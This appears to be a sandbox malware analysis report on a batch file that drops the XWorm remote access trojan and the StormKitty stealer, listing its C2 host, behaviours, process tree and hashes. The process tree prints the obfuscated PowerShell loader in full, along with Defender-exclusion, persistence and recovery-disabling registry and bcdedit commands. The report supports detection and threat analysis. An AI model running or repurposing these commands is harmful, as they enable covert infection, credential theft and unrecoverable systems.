Analysis

  • max time kernel
    299s
  • max time network
    308s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    25-08-2024 06:57

General

  • Target

    Uni.bat

  • Size

    359KB

  • MD5

    358406bc7ed5155f85a5ff1c578ee295

  • SHA1

    4e333529ae320ad77ebcc36fd9baa55796dc001d

  • SHA256

    da95cdaddcd020f216d54f93ebb9f0c8246b9dc1d02d9df60d898bc6c58e8ecf

  • SHA512

    0017064f87d9b5458e17c7e7348aa1ad0a3b1713ae44c202ab71e271b6a8a76bed7a3142cebe0b4a10c08220fbfae4f109a784151ca85130d48dbcb4dee65f45

  • SSDEEP

    6144:ZbaZI71pQSxrJ9chRObtodtQlcxWHovdigPbYDDV:Zbac1ySxr/3bU3FzUh

Malware Config

Extracted

Family

xworm

Version

5.0

C2

las-protected.gl.at.ply.gg:59571

Mutex

bDBtf4nPCk2LZaWE

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    Uni.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3876
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:4380
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FCWcthcvES5kWtKK+zyMWPaI12cI41cfQ1vED+zLcNQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Wi091llD0HYkl0mjuqK1Mw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dIHUu=New-Object System.IO.MemoryStream(,$param_var); $WlPMS=New-Object System.IO.MemoryStream; $ppSDL=New-Object System.IO.Compression.GZipStream($dIHUu, [IO.Compression.CompressionMode]::Decompress); $ppSDL.CopyTo($WlPMS); $ppSDL.Dispose(); $dIHUu.Dispose(); $WlPMS.Dispose(); $WlPMS.ToArray();}function execute_function($param_var,$param2_var){ $AbXeo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MiFGd=$AbXeo.EntryPoint; $MiFGd.Invoke($null, $param2_var);}$AMhPZ = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $AMhPZ;$pvMmn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($AMhPZ).Split([Environment]::NewLine);foreach ($CTBGC in $pvMmn) { if ($CTBGC.StartsWith(':: ')) { $lWiIS=$CTBGC.Substring(3); break; }}$payloads_var=[string[]]$lWiIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3572
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_153_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_153.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1388
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_153.vbs"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4296
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_153.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4932
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3144
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:3732
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FCWcthcvES5kWtKK+zyMWPaI12cI41cfQ1vED+zLcNQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Wi091llD0HYkl0mjuqK1Mw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dIHUu=New-Object System.IO.MemoryStream(,$param_var); $WlPMS=New-Object System.IO.MemoryStream; $ppSDL=New-Object System.IO.Compression.GZipStream($dIHUu, [IO.Compression.CompressionMode]::Decompress); $ppSDL.CopyTo($WlPMS); $ppSDL.Dispose(); $dIHUu.Dispose(); $WlPMS.Dispose(); $WlPMS.ToArray();}function execute_function($param_var,$param2_var){ $AbXeo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MiFGd=$AbXeo.EntryPoint; $MiFGd.Invoke($null, $param2_var);}$AMhPZ = 'C:\Users\Admin\AppData\Roaming\startup_str_153.bat';$host.UI.RawUI.WindowTitle = $AMhPZ;$pvMmn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($AMhPZ).Split([Environment]::NewLine);foreach ($CTBGC in $pvMmn) { if ($CTBGC.StartsWith(':: ')) { $lWiIS=$CTBGC.Substring(3); break; }}$payloads_var=[string[]]$lWiIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Drops startup file
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:4316
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4876
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2940
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Uni.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4668
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4448
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"
                  6⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4364
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lpociz.bat" "
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4180
                  • C:\Windows\system32\ReAgentc.exe
                    reagentc /disable
                    7⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    PID:4912
                  • C:\Windows\system32\reg.exe
                    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f
                    7⤵
                      PID:1176
                    • C:\Windows\system32\reg.exe
                      REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f
                      7⤵
                        PID:4424
                      • C:\Windows\system32\reg.exe
                        REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f
                        7⤵
                          PID:3968
                        • C:\Windows\system32\reg.exe
                          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsSetupOptions" /t REG_DWORD /d 1 /f
                          7⤵
                            PID:2012
                          • C:\Windows\system32\bcdedit.exe
                            bcdedit /set {default} bootstatuspolicy ignoreallfailures
                            7⤵
                            • Modifies boot configuration data using bcdedit
                            PID:2004
                          • C:\Windows\system32\reg.exe
                            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
                            7⤵
                              PID:4732
                            • C:\Windows\system32\reg.exe
                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d 0 /f
                              7⤵
                                PID:2804
                              • C:\Windows\system32\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                7⤵
                                  PID:4440
                                • C:\Windows\system32\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                  7⤵
                                    PID:2964
                                  • C:\Windows\system32\reg.exe
                                    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                    7⤵
                                      PID:3176
                                    • C:\Windows\system32\reg.exe
                                      REG ADD "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f
                                      7⤵
                                        PID:3788
                                      • C:\Windows\system32\reg.exe
                                        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
                                        7⤵
                                        • Disables RegEdit via registry modification
                                        PID:2612
                                      • C:\Windows\system32\reg.exe
                                        REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v "fAllowToGetHelp" /t REG_DWORD /d 0 /f
                                        7⤵
                                          PID:2044
                                        • C:\Windows\system32\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d 1 /f
                                          7⤵
                                            PID:2684
                                          • C:\Windows\system32\reg.exe
                                            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowCPL" /t REG_DWORD /d 1 /f
                                            7⤵
                                              PID:4076
                                            • C:\Windows\system32\reg.exe
                                              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoThemesTab" /t REG_DWORD /d 1 /f
                                              7⤵
                                                PID:4284
                                              • C:\Windows\system32\reg.exe
                                                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoDispSettings" /t REG_DWORD /d 1 /f
                                                7⤵
                                                  PID:4496
                                                • C:\Windows\system32\reg.exe
                                                  REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f
                                                  7⤵
                                                    PID:2096
                                                  • C:\Windows\system32\reg.exe
                                                    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f
                                                    7⤵
                                                      PID:2380
                                                    • C:\Windows\system32\reg.exe
                                                      REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f
                                                      7⤵
                                                        PID:2796
                                                      • C:\Windows\system32\bcdedit.exe
                                                        bcdedit /set {default} recoveryenabled No
                                                        7⤵
                                                        • Modifies boot configuration data using bcdedit
                                                        PID:4812
                                                      • C:\Windows\system32\reg.exe
                                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 2 /f
                                                        7⤵
                                                          PID:96
                                                        • C:\Windows\system32\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\WinRE" /v "DisableStatusMessages" /t REG_DWORD /d 1 /f
                                                          7⤵
                                                            PID:1508
                                                          • C:\Windows\system32\reg.exe
                                                            REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute" /v "AutoChk" /t REG_MULTI_SZ /d "" /f
                                                            7⤵
                                                              PID:4856
                                                            • C:\Windows\system32\reg.exe
                                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                              7⤵
                                                                PID:2624
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /Change /TN "\Microsoft\Windows\WinRE\WinREBootIndex" /Disable
                                                                7⤵
                                                                  PID:4756
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /Change /TN "\Microsoft\Windows\WinRE\WinRECleanup" /Disable
                                                                  7⤵
                                                                    PID:2404
                                                                  • C:\Windows\system32\reg.exe
                                                                    REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\sr" /v "Start" /t REG_DWORD /d 4 /f
                                                                    7⤵
                                                                      PID:832
                                                                    • C:\Windows\system32\reg.exe
                                                                      REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\CrashControl" /v "AutoReboot" /t REG_DWORD /d 0 /f
                                                                      7⤵
                                                                        PID:1828
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc config wercplsupport start=disabled
                                                                        7⤵
                                                                        • Launches sc.exe
                                                                        PID:2248
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc config WerSvc start=disabled
                                                                        7⤵
                                                                        • Launches sc.exe
                                                                        PID:2204
                                                          • C:\Windows\system32\taskmgr.exe
                                                            "C:\Windows\system32\taskmgr.exe" /7
                                                            1⤵
                                                              PID:4328
                                                            • C:\Users\Admin\Uni.exe
                                                              C:\Users\Admin\Uni.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              PID:3504
                                                            • C:\Windows\system32\eudcedit.exe
                                                              "C:\Windows\system32\eudcedit.exe"
                                                              1⤵
                                                              • Drops file in Windows directory
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:2604
                                                            • C:\Windows\system32\cmd.exe
                                                              "C:\Windows\system32\cmd.exe"
                                                              1⤵
                                                                PID:4356

                                                              Network

                                                              MITRE ATT&CK Enterprise v15

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                Filesize

                                                                3KB

                                                                MD5

                                                                ad5cd538ca58cb28ede39c108acb5785

                                                                SHA1

                                                                1ae910026f3dbe90ed025e9e96ead2b5399be877

                                                                SHA256

                                                                c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

                                                                SHA512

                                                                c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                0869030f7e13786291243ca4a192588d

                                                                SHA1

                                                                b21e2f75666dd2d5d5dd841fa5d7e0cd9d5aaa9b

                                                                SHA256

                                                                7e40e2510ef6feb9e8532a55f3f54abc332cab5293dda19701c14e3d708de762

                                                                SHA512

                                                                900fe3627cc98aecb119f1efdf8fbc46e2ae861f9b27c667ba0164b253ae9728a84f610810a7f4c1a169fa1d6ed4a309e1bec4f4b5f6fb2f65f8b67062db923d

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                1fbbf712fe7afb8b9d118ea50b362b68

                                                                SHA1

                                                                015d64c5d23a3d32f314273d44779b497d4ec1c4

                                                                SHA256

                                                                9e350c7160cc69636897313ca63db9746485312aa2346b3629dec783322c2c84

                                                                SHA512

                                                                4bc10cfb2ea7339302ed76043160d1173b3708b21b6402d4087c81eb8f2165bbf0541cdacbea3a1b6a06f4d594feaac7a802ed3df7db751a3ada33d47d13677f

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                5b3d652371070a101abf31c5feae12dc

                                                                SHA1

                                                                b49570cde68379d64a45e692a158392fa48012b3

                                                                SHA256

                                                                612a34095ff6299aacf6ff02e61e8cdae1bfe4d6bf62d8c302284b2988ef5fbd

                                                                SHA512

                                                                4481f5fd198f787e9b64f2297d09566b53ab772c779f885f795f3bc1946baece2c553849c522ff6fd5d61cd653cf1de547ab4ac6eec6da26355b227db3a75277

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                76afb458030b8ea422b69e7381a2d180

                                                                SHA1

                                                                c9cc1c421428b5feefda78e7e0c7a7892311d019

                                                                SHA256

                                                                db58d284ba096140c22528d5fa06ef315d1e6663392b447d41112c892c14ed30

                                                                SHA512

                                                                debf8daaa41eb72ce042f44f813c3e8c6b607cf8dfe72946a92412293ee003227438a457bd6519b063f2d0f43b593a25247a5422a34d4f660f2e2a3ada523009

                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pzf4przo.w1j.ps1

                                                                Filesize

                                                                1B

                                                                MD5

                                                                c4ca4238a0b923820dcc509a6f75849b

                                                                SHA1

                                                                356a192b7913b04c54574d18c28d46e6395428ab

                                                                SHA256

                                                                6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                SHA512

                                                                4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                              • C:\Users\Admin\AppData\Local\Temp\lpociz.bat

                                                                Filesize

                                                                3KB

                                                                MD5

                                                                ecde221cbc92ee55ae5b8c1a24e98f56

                                                                SHA1

                                                                ebda0dba4abcd3bf93183e2787cc9e5f9f1448ee

                                                                SHA256

                                                                b6fbab33e31d0a525d4c752886d812c1c46477f6314da7bde25bdc8198cb70cb

                                                                SHA512

                                                                122673ad96f1e407c75a93672f6538f342499f4e14221cbe4103c601362667487f3f33800230572e255b55e691e5068adce6336a4ffe1a651bff465d2c2d3493

                                                              • C:\Users\Admin\AppData\Roaming\startup_str_153.bat

                                                                Filesize

                                                                359KB

                                                                MD5

                                                                358406bc7ed5155f85a5ff1c578ee295

                                                                SHA1

                                                                4e333529ae320ad77ebcc36fd9baa55796dc001d

                                                                SHA256

                                                                da95cdaddcd020f216d54f93ebb9f0c8246b9dc1d02d9df60d898bc6c58e8ecf

                                                                SHA512

                                                                0017064f87d9b5458e17c7e7348aa1ad0a3b1713ae44c202ab71e271b6a8a76bed7a3142cebe0b4a10c08220fbfae4f109a784151ca85130d48dbcb4dee65f45

                                                              • C:\Users\Admin\AppData\Roaming\startup_str_153.vbs

                                                                Filesize

                                                                115B

                                                                MD5

                                                                455afbf4e024ce8a698280d54a0a0acf

                                                                SHA1

                                                                db2319502b47b9aa421bc420283c1097fdea42b4

                                                                SHA256

                                                                3c1478e1d8d6a676ac2ef983c1bf2f6b8739bab8b3e9827e76c1382c8af1cd49

                                                                SHA512

                                                                1c62e8ffc6056093b1fbecb359746b348a023ac50ced98b60ea01da07aaf27ef52019dc3e514e4ff481838ac550ed164dfce2c06dd0478db9e53d5bd97d62e70

                                                              • C:\Users\Admin\Uni.exe

                                                                Filesize

                                                                435KB

                                                                MD5

                                                                f7722b62b4014e0c50adfa9d60cafa1c

                                                                SHA1

                                                                f31c17e0453f27be85730e316840f11522ddec3e

                                                                SHA256

                                                                ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

                                                                SHA512

                                                                7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

                                                              • memory/1388-79-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

                                                                Filesize

                                                                9.9MB

                                                              • memory/1388-41-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

                                                                Filesize

                                                                9.9MB

                                                              • memory/1388-44-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

                                                                Filesize

                                                                9.9MB

                                                              • memory/1388-45-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

                                                                Filesize

                                                                9.9MB

                                                              • memory/3504-383-0x00000157F8AA0000-0x00000157F8ADC000-memory.dmp

                                                                Filesize

                                                                240KB

                                                              • memory/3572-75-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

                                                                Filesize

                                                                9.9MB

                                                              • memory/3572-12-0x000002059F9A0000-0x000002059FA16000-memory.dmp

                                                                Filesize

                                                                472KB

                                                              • memory/3572-59-0x00007FF8C0603000-0x00007FF8C0604000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/3572-58-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

                                                                Filesize

                                                                9.9MB

                                                              • memory/3572-29-0x000002059F960000-0x000002059F994000-memory.dmp

                                                                Filesize

                                                                208KB

                                                              • memory/3572-93-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

                                                                Filesize

                                                                9.9MB

                                                              • memory/3572-5-0x000002059F7F0000-0x000002059F812000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/3572-8-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

                                                                Filesize

                                                                9.9MB

                                                              • memory/3572-28-0x000002059F940000-0x000002059F948000-memory.dmp

                                                                Filesize

                                                                32KB

                                                              • memory/3572-23-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

                                                                Filesize

                                                                9.9MB

                                                              • memory/3572-0-0x00007FF8C0603000-0x00007FF8C0604000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/3572-10-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

                                                                Filesize

                                                                9.9MB

                                                              • memory/4316-120-0x0000019C77920000-0x0000019C77930000-memory.dmp

                                                                Filesize

                                                                64KB

                                                              • memory/4316-117-0x0000019C77940000-0x0000019C77974000-memory.dmp

                                                                Filesize

                                                                208KB

                                                              • memory/4316-425-0x0000019C78180000-0x0000019C782A0000-memory.dmp

                                                                Filesize

                                                                1.1MB

                                                              • memory/4316-476-0x0000019C5F610000-0x0000019C5F61A000-memory.dmp

                                                                Filesize

                                                                40KB